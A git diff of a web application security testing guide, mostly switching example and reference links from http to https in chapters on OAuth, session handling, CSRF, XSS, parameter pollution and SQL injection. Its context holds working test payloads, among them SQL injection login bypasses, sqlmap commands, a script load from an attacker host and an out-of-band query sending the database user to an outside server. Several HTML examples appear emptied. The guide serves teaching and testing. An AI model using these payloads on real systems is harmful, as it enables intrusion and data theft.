@@ If you know the `client_id` and `client_secret`, it is possible to obtain a toke $ curl --request POST \ --url https://as.example.com/oauth/token \ --header 'content-type: application/json' \ - --data '{"client_id":"","client_secret":"","grant_type":"client_credentials"}' --proxy http://localhost:8080/ -k + --data '{"client_id":"","client_secret":"","grant_type":"client_credentials"}' --proxy https://localhost:8080/ -k ``` ### Credential Leakage diff --git a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05.1-Testing_for_OAuth_Authorization_Server_Weaknesses.md b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05.1-Testing_for_OAuth_Authorization_Server_Weaknesses.md index a96ff404bf..a4948806a2 100644 --- a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05.1-Testing_for_OAuth_Authorization_Server_Weaknesses.md +++ b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05.1-Testing_for_OAuth_Authorization_Server_Weaknesses.md @@ -54,7 +54,7 @@ HTTP/1.1 302 Found Date: Mon, 18 Oct 2021 20:46:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 340 -Location: http://client.example.com/?code=example&state=example +Location: https://client.example.com/?code=example&state=example ``` To test if the AS is vulnerable to insufficient redirect URI validation, capture the traffic with an HTTP intercepting proxy such as ZAP. @@ -92,7 +92,7 @@ Host: as.example.com "client_id":"example-client", "code":"INJECT_CODE_HERE", "grant_type":"authorization_code", - "redirect_uri":"http://client.example.com" + "redirect_uri":"https://client.example.com" } ``` @@ -170,7 +170,7 @@ Host: as.example.com "code_verifier":"MODIFY_OR_OMIT_THIS", "code":"example", "grant_type":"authorization_code", -"redirect_uri":"http://client.example.com" +"redirect_uri":"https://client.example.com" } ``` @@ -221,7 +221,7 @@ The following HTML page can be used to load the authorization page in an iframe: Clickjack test page - + ``` diff --git a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.md b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.md index 5d061091ec..863e1697fe 100644 --- a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.md +++ b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.md @@ -200,10 +200,9 @@ More information here: [Testing for cookies attributes](02-Testing_for_Cookies_A - [RFC 2965 "HTTP State Management Mechanism"](https://tools.ietf.org/html/rfc2965) - [RFC 1750 "Randomness Recommendations for Security"](https://www.ietf.org/rfc/rfc1750.txt) -- [Michal Zalewski: "Strange Attractors and TCP/IP Sequence Number Analysis" (2001)](http://lcamtuf.coredump.cx/oldtcp/tcpseq.html) -- [Michal Zalewski: "Strange Attractors and TCP/IP Sequence Number Analysis - One Year Later" (2002)](http://lcamtuf.coredump.cx/newtcp/) -- [Correlation Coefficient](http://mathworld.wolfram.com/CorrelationCoefficient.html) +- [Michal Zalewski: "Strange Attractors and TCP/IP Sequence Number Analysis" (2001)](https://lcamtuf.coredump.cx/oldtcp/tcpseq.html) +- [Michal Zalewski: "Strange Attractors and TCP/IP Sequence Number Analysis - One Year Later" (2002)](https://lcamtuf.coredump.cx/newtcp/) +- [Correlation Coefficient](https://mathworld.wolfram.com/CorrelationCoefficient.html) - [ENT](https://fourmilab.ch/random/) - [DMA 2005-0614a - Global Hauri ViRobot Server cookie overflow](https://seclists.org/lists/fulldisclosure/2005/Jun/0188.html) -- [Gunter Ollmann: "Web Based Session Management"](http://www.technicalinfo.net) - [OWASP Code Review Guide](https://wiki.owasp.org/index.php/Category:OWASP_Code_Review_Project) diff --git a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.md b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.md index 765c9345f5..822a820a76 100644 --- a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.md +++ b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.md @@ -53,7 +53,7 @@ Next, if the tester successfully authenticates to the application with the follo POST /authentication.php HTTP/1.1 Host: www.example.com [...] -Referer: http://www.example.com +Referer: https://www.example.com Cookie: JSESSIONID=0000d8eyYq3L0z2fgq10m4v-rt4:-1 Content-Type: application/x-www-form-urlencoded Content-length: 57 @@ -117,4 +117,4 @@ The application should always first invalidate the existing session ID before au - [Session Fixation](https://owasp.org/www-community/attacks/Session_fixation) - [ACROS Security](https://www.acrossecurity.com/papers/session_fixation.pdf) -- [Chris Shiflett](http://shiflett.org/articles/session-fixation) +- [Chris Shiflett](https://shiflett.org/articles/session-fixation) diff --git a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables.md b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables.md index 1389f7a021..d8179e2b93 100644 --- a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables.md +++ b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables.md @@ -53,7 +53,7 @@ The application should also be configured to secure data in caches over both HTT In general, GET requests should not be used, as the Session ID may be exposed in Proxy or Firewall logs. They are also far more easily manipulated than other types of transport, although it should be noted that almost any mechanism can be manipulated by the client with the right tools. Furthermore, [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) attacks are most easily exploited by sending a specially constructed link to the victim. This is far less likely if data is sent from the client as POSTs. -All server-side code receiving data from POST requests should be tested to ensure it does not accept the data if sent as a GET. For example, consider the following POST request (`http://owaspapp.com/login.asp`) generated by a log in page. +All server-side code receiving data from POST requests should be tested to ensure it does not accept the data if sent as a GET. For example, consider the following POST request (`https://owaspapp.com/login.asp`) generated by a log in page. ```http POST /login.asp HTTP/1.1 @@ -65,7 +65,7 @@ Content-Length: 51 Login=Username&password=Password&SessionID=12345678 ``` -If login.asp is badly implemented, it may be possible to log in using the following URL: `http://owaspapp.com/login.asp?Login=Username&password=Password&SessionID=12345678` +If login.asp is badly implemented, it may be possible to log in using the following URL: `https://owaspapp.com/login.asp?Login=Username&password=Password&SessionID=12345678` Potentially insecure server-side scripts may be identified by checking each POST in this way. diff --git a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md index 649a45f7ec..801a38b1f3 100644 --- a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md +++ b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md @@ -62,7 +62,7 @@ In integrated mail/browser environments, simply displaying an email message cont ``` -In this example, `[attacker]` is a site controlled by the attacker. By utilizing a redirect mechanism, the malicious site may use `http://[attacker]/picture.gif` to direct the victim to `http://[thirdparty]/action` and trigger the `action`. +In this example, `[attacker]` is a site controlled by the attacker. By utilizing a redirect mechanism, the malicious site may use `https://[attacker]/picture.gif` to direct the victim to `https://[thirdparty]/action` and trigger the `action`. Cookies are not the only example involved in this kind of vulnerability. Web applications whose session information is entirely supplied by the browser are vulnerable too. This includes applications relying on HTTP authentication mechanisms alone, since the authentication information is known by the browser and is sent automatically upon each request. This does not include form-based authentication, which occurs just once and generates some form of session-related information, usually a cookie. @@ -130,7 +130,7 @@ In case of POST, the following sample can be used. -
+
@@ -145,7 +145,7 @@ In case of web applications in which developers are utilizing JSON for browser t -
+
@@ -178,9 +178,9 @@ When this data is sent as a POST request, the server will happily accept the nam ## References - [Peter W: "Cross-Site Request Forgeries"](https://web.archive.org/web/20160303230910/http://www.tux.org/~peterw/csrf.txt) -- [Thomas Schreiber: "Session Riding"](https://web.archive.org/web/20160304001446/http://www.securenet.de/papers/Session_Riding.pdf) -- [Oldest known post](https://web.archive.org/web/20000622042229/http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan) +- [Thomas Schreiber: "Session Riding"](https://web.archive.org/web/20160304001446/https://www.securenet.de/papers/Session_Riding.pdf) +- [Oldest known post](https://web.archive.org/web/20000622042229/https://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan) - [Cross-site Request Forgery FAQ](https://www.cgisecurity.com/csrf-faq.html) -- [A Most-Neglected Fact About Cross Site Request Forgery (CSRF)](http://yehg.net/lab/pr0js/view.php/A_Most-Neglected_Fact_About_CSRF.pdf) +- [A Most-Neglected Fact About Cross Site Request Forgery (CSRF)](https://yehg.net/lab/pr0js/view.php/A_Most-Neglected_Fact_About_CSRF.pdf) - [Multi-POST CSRF](https://www.lanmaster53.com/2013/07/17/multi-post-csrf/) - [SANS Pen Test Webcast: Complete Application pwnage via Multi POST XSRF](https://www.youtube.com/watch?v=EOs5PZiiwug) diff --git a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/08-Testing_for_Session_Puzzling.md b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/08-Testing_for_Session_Puzzling.md index ff80d1a596..7deec58b20 100644 --- a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/08-Testing_for_Session_Puzzling.md +++ b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/08-Testing_for_Session_Puzzling.md @@ -46,4 +46,4 @@ Session variables should only be used for a single consistent purpose. ## References - [Session Puzzles](https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/puzzlemall/Session%20Puzzles%20-%20Indirect%20Application%20Attack%20Vectors%20-%20May%202011%20-%20Whitepaper.pdf) -- [Session Puzzling and Session Race Conditions](http://sectooladdict.blogspot.com/2011/09/session-puzzling-and-session-race.html) +- [Session Puzzling and Session Race Conditions](https://sectooladdict.blogspot.com/2011/09/session-puzzling-and-session-race.html) diff --git a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.md b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.md index 647221c87a..df44d9e771 100644 --- a/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.md +++ b/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.md @@ -10,9 +10,9 @@ An attacker who gets access to user session cookies can impersonate them by pres Note that the `Secure` attribute should also be used when the web application is entirely deployed over HTTPS, otherwise the following cookie theft attack is possible. Assume that `example.com` is entirely deployed over HTTPS, but does not mark its session cookies as `Secure`. The following attack steps are possible: -1. The victim sends a request to `http://another-site.com`. -2. The attacker corrupts the corresponding response so that it triggers a request to `http://example.com`. -3. The browser now tries to access `http://example.com`. +1. The victim sends a request to `https://another-site.com`. +2. The attacker corrupts the corresponding response so that it triggers a request to `https://example.com`. +3. The browser now tries to access `https://example.com`. 4. Though the request fails, the session cookies are leaked in the clear over HTTP. Alternatively, session hijacking can be prevented by banning use of HTTP using [HSTS](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security). Note that there is a subtlety here related to cookie scoping. In particular, full HSTS adoption is required when session cookies are issued with the `Domain` attribute set. @@ -21,9 +21,9 @@ Full HSTS adoption is described in a paper called *Testing for Integrity Flaws i With the `Domain` attribute set, session cookies can be shared across sub-domains. Use of HTTP with sub-domains should be avoided to prevent the disclosure of unencrypted cookies sent over HTTP. To exemplify this security flaw, assume that the site `example.com` activates HSTS without the `includeSubDomains` option. The site issues session cookies with the `Domain` attribute set to `example.com`. The following attack is possible: -1. The victim sends a request to `http://another-site.com`. -2. The attacker corrupts the corresponding response so that it triggers a request to `http://fake.example.com`. -3. The browser now tries to access `http://fake.example.com`, which is permitted by the HSTS configuration. +1. The victim sends a request to `https://another-site.com`. +2. The attacker corrupts the corresponding response so that it triggers a request to `https://fake.example.com`. +3. The browser now tries to access `https://fake.example.com`, which is permitted by the HSTS configuration. 4. Since the request is sent to a sub-domain of `example.com` with the `Domain` attribute set, it includes the session cookies, which are leaked in the clear over HTTP. Full HSTS should be activated on the apex domain to prevent this attack. diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md index 7d9631515e..b7b1aa550f 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md @@ -78,7 +78,7 @@ The tester must suspect that every data entry point can result in an XSS attack. Let's try to click on the following link and see what happens: ```text -http://example.com/index.php?user= +https://example.com/index.php?user= ``` If no sanitization is applied this will result in the following popup: @@ -93,7 +93,7 @@ This indicates that there is an XSS vulnerability and it appears that the tester Let's try other piece of code (link): ```text -http://example.com/index.php?user= +https://example.com/index.php?user= ``` This produces the following behavior: @@ -169,13 +169,13 @@ Decoupling the above regular expression: 3. Any character but the character `>` for one or more occurrences 4. Check for a `src` -This is useful for filtering expressions like `` which is a common attack. But, in this case, it is possible to bypass the sanitization by using the `>` character in an attribute between script and src, like this: +This is useful for filtering expressions like `` which is a common attack. But, in this case, it is possible to bypass the sanitization by using the `>` character in an attribute between script and src, like this: ```text -http://example/?var="%20SRC="http://attacker/xss.js"> +https://example/?var="%20SRC="https://attacker/xss.js"> ``` -This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim site, `http://example/`. +This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim site, `https://example/`. #### Example 7: HTTP Parameter Pollution (HPP) @@ -183,13 +183,13 @@ Another method to bypass filters is the HTTP Parameter Pollution, this technique Regular attack: ```text -http://example/page.php?param= +https://example/page.php?param= ``` Attack using HPP: ```text -http://example/page.php?param=[...] +https://example/page.php?param=[...] ``` See the [XSS Filter Evasion Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet) for a more detailed list of filter evasion techniques. Finally, analyzing answers can get complex. A simple way to do this is to use code that pops up a dialog, as in our example. This typically indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers. @@ -204,7 +204,7 @@ If source code is available (white-box testing), all variables received from use - [PHP Charset Encoder(PCE)](https://cybersecurity.wtf/encoder/) helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads. - [Hackvertor](https://hackvertor.co.uk/public) is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input). -- [XSS-Proxy](http://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool. +- [XSS-Proxy](https://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool. - [ratproxy](https://code.google.com/archive/p/ratproxy/) is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments. - [Burp Proxy](https://portswigger.net/burp/) is an interactive HTTP/S proxy server for attacking and testing web applications. - [Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner. @@ -225,5 +225,4 @@ If source code is available (white-box testing), all variables received from use - [CERT - Malicious HTML Tags Embedded in Client Web Requests](https://resources.sei.cmu.edu/asset_files/WhitePaper/2000_019_001_496188.pdf) - [cgisecurity.com - The Cross Site Scripting FAQ](https://www.cgisecurity.com/xss-faq.html) -- [G.Ollmann - HTML Code Injection and Cross-site scripting](http://www.technicalinfo.net/papers/CSS.html) - [S. Frei, T. Dübendorfer, G. Ollmann, M. May - Understanding the Web browser threat](https://www.techzoom.net/Publications/Insecurity-Iceberg) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md index ef7c84e075..8a3eeea5f1 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md @@ -26,7 +26,7 @@ Stored XSS does not need a malicious link to be exploited. A successful exploita - User visits vulnerable page - Malicious code is executed by the user's browser -This type of attack can also be exploited with browser exploitation frameworks such as [BeEF](https://beefproject.com) and [XSS Proxy](http://xss-proxy.sourceforge.net/). These frameworks allow for complex JavaScript exploit development. +This type of attack can also be exploited with browser exploitation frameworks such as [BeEF](https://beefproject.com) and [XSS Proxy](https://xss-proxy.sourceforge.net/). These frameworks allow for complex JavaScript exploit development. Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens. @@ -98,7 +98,7 @@ Ensure the input is submitted through the application. This normally involves di #### Leverage Stored XSS with BeEF -Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [BeEF](https://www.beefproject.com) and [XSS Proxy](http://xss-proxy.sourceforge.net/). +Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [BeEF](https://www.beefproject.com) and [XSS Proxy](https://xss-proxy.sourceforge.net/). A typical BeEF exploitation scenario involves: @@ -111,7 +111,7 @@ The JavaScript hook can be injected by exploiting the XSS vulnerability in the w **Example**: BeEF Injection in `index2.php`: ```html -aaa@aa.com"> +aaa@aa.com"> ``` When the user loads the page `index2.php`, the script `hook.js` is executed by the browser. It is then possible to access cookies, user screenshot, user clipboard, and launch complex XSS attacks. @@ -185,7 +185,7 @@ The following table summarizes some special variables and functions to look at w - [PHP Charset Encoder(PCE)](https://cybersecurity.wtf/encoder/) helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads. - [Hackvertor](https://hackvertor.co.uk/public) is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input). - [BeEF](https://www.beefproject.com) is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities. -- [XSS-Proxy](http://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool. +- [XSS-Proxy](https://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool. - [Burp Proxy](https://portswigger.net/burp/) is an interactive HTTP/S proxy server for attacking and testing web applications. - [XSS Assistant](https://www.greasespot.net/) Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws. - [Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner. @@ -207,5 +207,4 @@ The following table summarizes some special variables and functions to look at w - [CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"](https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186) - [Amit Klein: "Cross-site Scripting Explained"](https://courses.csail.mit.edu/6.857/2009/handouts/css-explained.pdf) -- [Gunter Ollmann: "HTML Code Injection and Cross-site Scripting"](http://www.technicalinfo.net/papers/CSS.html) - [CGISecurity.com: "The Cross Site Scripting FAQ"](https://www.cgisecurity.com/xss-faq.html) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md index 9cecba4a7d..320db4eb15 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md @@ -20,7 +20,7 @@ In 2009, immediately after the publication of the first research on HTTP Paramet One of these flaws, affecting *ModSecurity SQL Injection Core Rules*, represents a perfect example of the impedance mismatch between applications and filters. The ModSecurity filter would correctly apply a deny list for the following string: `select 1,2,3 from table`, thus blocking this example URL from being processed by the web server: `/index.aspx?page=select 1,2,3 from table`. However, by exploiting the concatenation of multiple HTTP parameters, an attacker could cause the application server to concatenate the string after the ModSecurity filter already accepted the input. As an example, the URL `/index.aspx?page=select 1&page=2,3` from table would not trigger the ModSecurity filter, yet the application layer would concatenate the input back into the full malicious string. -Another HPP vulnerability turned out to affect *Apple Cups*, the well-known printing system used by many UNIX systems. Exploiting HPP, an attacker could easily trigger a Cross-Site Scripting vulnerability using the following URL: `http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos`. The application validation checkpoint could be bypassed by adding an extra `kerberos` argument having a valid string (e.g. empty string). As the validation checkpoint would only consider the second occurrence, the first `kerberos` parameter was not properly sanitized before being used to generate dynamic HTML content. Successful exploitation would result in JavaScript code execution under the context of the hosting site. +Another HPP vulnerability turned out to affect *Apple Cups*, the well-known printing system used by many UNIX systems. Exploiting HPP, an attacker could easily trigger a Cross-Site Scripting vulnerability using the following URL: `https://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos`. The application validation checkpoint could be bypassed by adding an extra `kerberos` argument having a valid string (e.g. empty string). As the validation checkpoint would only consider the second occurrence, the first `kerberos` parameter was not properly sanitized before being used to generate dynamic HTML content. Successful exploitation would result in JavaScript code execution under the context of the hosting site. ### Authentication Bypass @@ -39,7 +39,7 @@ The flaw resided in the authentication mechanism used by the web application, as The following table illustrates how different web technologies behave in presence of multiple occurrences of the same HTTP parameter. -Given the URL and querystring: `http://example.com/?color=red&color=blue` +Given the URL and querystring: `https://example.com/?color=red&color=blue` | Web Application Server Backend | Parsing Result | Example | |--------------------------------|----------------|--------| @@ -78,19 +78,19 @@ To test for HPP vulnerabilities, identify any form or action that allows user-su For example: if testing the `search_string` parameter in the query string, the request URL would include that parameter name and value: ```text -http://example.com/?search_string=kittens +https://example.com/?search_string=kittens ``` The particular parameter might be hidden among several other parameters, but the approach is the same; leave the other parameters in place and append the duplicate: ```text -http://example.com/?mode=guest&search_string=kittens&num_results=100 +https://example.com/?mode=guest&search_string=kittens&num_results=100 ``` Append the same parameter with a different value: ```text -http://example.com/?mode=guest&search_string=kittens&num_results=100&search_string=puppies +https://example.com/?mode=guest&search_string=kittens&num_results=100&search_string=puppies ``` and submit the new request. @@ -134,4 +134,4 @@ In particular, pay attention to responses having HPP vectors within `data`, `src - [Client-side HTTP Parameter Pollution Example (Yahoo! Classic Mail flaw) - Stefano di Paola](https://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html) - [How to Detect HTTP Parameter Pollution Attacks - Chrysostomos Daniel](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/) - [CAPEC-460: HTTP Parameter Pollution (HPP) - Evgeny Lebanidze](https://capec.mitre.org/data/definitions/460.html) -- [Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications - Marco Balduzzi, Carmen Torrano Gimenez, Davide Balzarotti, Engin Kirda](http://s3.eurecom.fr/docs/ndss11_hpp.pdf) +- [Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications - Marco Balduzzi, Carmen Torrano Gimenez, Davide Balzarotti, Engin Kirda](https://s3.eurecom.fr/docs/ndss11_hpp.pdf) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md index 8a0726f9ca..d92166c1bc 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md @@ -97,7 +97,7 @@ The query will be: If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable site is `www.example.com`, the request that we'll carry out will be: -`http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1` +`https://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1` After a short analysis, we notice that the query returns a value (or a set of values) because the condition is always true (`OR 1=1`). In this way, the system has authenticated the user without knowing the username and password. @@ -121,7 +121,7 @@ In this way, we'll get the following query: The request URL will be: -`http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo` +`https://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo` This may return some values. Sometimes, the authentication code verifies that the number of returned records/results is exactly equal to 1. In the previous examples, this situation would be difficult (in the database there is only one value per user). To get around this problem, it is enough to insert an SQL command that imposes a condition that the number of the returned results must be one (one record returned). To reach this goal, we use the operator `LIMIT `, where `` is the number of the results/records that we want to be returned. Concerning the previous example, the value of the fields Username and Password will be modified as follows: @@ -131,7 +131,7 @@ This may return some values. Sometimes, the authentication code verifies that th In this way, we create a request like the following: -`http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo` +`https://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo` #### SELECT Statement @@ -141,19 +141,19 @@ Consider the following SQL query: Consider also the request to a script that executes the query above: -`http://www.example.com/product.php?id=10` +`https://www.example.com/product.php?id=10` When the tester tries a valid value (e.g. 10 in this case), the application will return the description of a product. A good way to test if the application is vulnerable in this scenario is to play with logic, using the operators AND and OR. Consider the request: -`http://www.example.com/product.php?id=10 AND 1=2` +`https://www.example.com/product.php?id=10 AND 1=2` `SELECT * FROM products WHERE id_product=10 AND 1=2` In this case, probably the application would return some message telling us there is no content available or a blank page. Then the tester can send a true statement and check if there is a valid result: -`http://www.example.com/product.php?id=10 AND 1=1` +`https://www.example.com/product.php?id=10 AND 1=1` #### Stacked Queries @@ -165,7 +165,7 @@ Consider the following SQL query: A way to exploit the above scenario would be: -`http://www.example.com/product.php?id=10; INSERT INTO users (…)` +`https://www.example.com/product.php?id=10; INSERT INTO users (…)` This way is possible to execute many queries in a row and independent of the first query. @@ -240,7 +240,7 @@ The first detail a tester needs to find to exploit the SQL injection vulnerabili To achieve this, the tester can use the `ORDER BY` clause followed by a number indicating the numeration of the database’s column selected: -`http://www.example.com/product.php?id=10 ORDER BY 10--` +`https://www.example.com/product.php?id=10 ORDER BY 10--` If the query executes with success, the tester can assume in this example that there are 10 or more columns in the `SELECT` statement. If the query fails, then there must be fewer than 10 columns returned by the query. If there is an error message available, it would probably be: @@ -248,7 +248,7 @@ If the query executes with success, the tester can assume in this example that t After the tester finds out the number of columns, the next step is to find out the type of columns. Assuming there were 3 columns in the example above, the tester could try each column type, using the NULL value to help them: -`http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--` +`https://www.example.com/product.php?id=10 UNION SELECT 1,null,null--` If the query fails, the tester will probably see a message like: @@ -256,11 +256,11 @@ If the query fails, the tester will probably see a message like: If the query executes with success, the first column can be an integer. Then the tester can move further and so on: -`http://www.example.com/product.php?id=10 UNION SELECT 1,1,null--` +`https://www.example.com/product.php?id=10 UNION SELECT 1,1,null--` After the successful information gathering, depending on the application, it may only show the tester the first result, because the application treats only the first line of the result set. In this case, it is possible to use a `LIMIT` clause or the tester can set an invalid value, making only the second query valid (supposing there is no entry in the database that has an ID that equals 99999): -`http://www.example.com/product.php?id=99999 UNION SELECT 1,1,null--` +`https://www.example.com/product.php?id=99999 UNION SELECT 1,1,null--` #### Hidden Union Exploitation Technique @@ -470,7 +470,7 @@ This can be your payload for extracting the version of the database: So the target URL would be like this: ```text -http://example.org/search?query=abcd'+AND+1=2+UNION+SELECT+"+'AND 1=2+UNION+SELECT+@@version+--+-"+--+- +https://example.org/search?query=abcd'+AND+1=2+UNION+SELECT+"+'AND 1=2+UNION+SELECT+@@version+--+-"+--+- ``` Automation: @@ -478,13 +478,13 @@ Automation: - _custom injection point marker_ (`*`): ```text - sqlmap -u "http://example.org/search?query=abcd'AND 1=2 UNION SELECT \"*\"-- -" + sqlmap -u "https://example.org/search?query=abcd'AND 1=2 UNION SELECT \"*\"-- -" ``` - `--prefix` and `--suffix` flags: ```text - sqlmap -u "http://example.org/search?query=abcd" --prefix="'AND 1=2 UNION SELECT \"" --suffix="\"-- -" + sqlmap -u "https://example.org/search?query=abcd" --prefix="'AND 1=2 UNION SELECT \"" --suffix="\"-- -" ``` #### Boolean Exploitation Technique @@ -493,7 +493,7 @@ The Boolean exploitation technique is very useful when the tester finds a [Blind By using inference methods, it is possible to avoid this obstacle and thus succeed in recovering the values of some desired fields. This method consists of carrying out a series of boolean queries against the server, observing the answers, and finally deducing the meaning of such answers. We consider, as always, the `www.example.com` domain and we suppose that it contains a parameter named `id` vulnerable to SQL injection. This means that when carrying out the following request: -`http://www.example.com/index.php?id=1'` +`https://www.example.com/index.php?id=1'` We will get one page with a custom error message which is due to a syntactic error in the query. We suppose that the query executed on the server is: @@ -549,11 +549,11 @@ Consider the following SQL query: Consider also the request to a script that executes the query above: -`http://www.example.com/product.php?id=10` +`https://www.example.com/product.php?id=10` The malicious request would be (e.g. Oracle 10g): -`http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--` +`https://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--` In this example, the tester is concatenating the value 10 with the result of the function `UTL_INADDR.GET_HOST_NAME`. This Oracle function will try to return the hostname of the parameter passed to it, which is another query, the name of the user. When the database looks for a hostname with the user database name, it will fail and return an error message like: @@ -571,11 +571,11 @@ Consider the following SQL query: Consider also the request to a script that executes the query above: -`http://www.example.com/product.php?id=10` +`https://www.example.com/product.php?id=10` The malicious request would be: -`http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--` 